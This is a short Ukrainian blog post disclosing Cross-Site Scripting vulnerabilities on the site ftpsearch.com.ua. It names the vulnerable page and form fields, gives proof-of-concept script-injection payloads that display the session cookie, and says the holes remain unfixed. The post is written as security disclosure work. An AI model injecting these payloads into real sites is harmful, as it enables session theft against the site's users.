Уразливості на ftpsearch.com.ua

19:40 06.01.2008

08.08.2007

У лютому, 09.02.2007 (а також додатково сьогодні), я знайшов Cross-Site Scripting уразливості на проекті ftpsearch.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

06.01.2008

XSS:

http://ftpsearch.com.ua

POST запит на сторінці http://ftpsearch.com.ua/profiles.php?
sid=20070808&what=emailstory:

"><script>alert(document.cookie)</script>В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.

</textarea><script>alert(document.cookie)</script>В полі: Короткое сообщение.

http://i.ftpsearch.com.ua

http://google.ftpsearch.com.ua

Дані уразливості досі не виправлені.


Leave a Reply

You must be logged in to post a comment.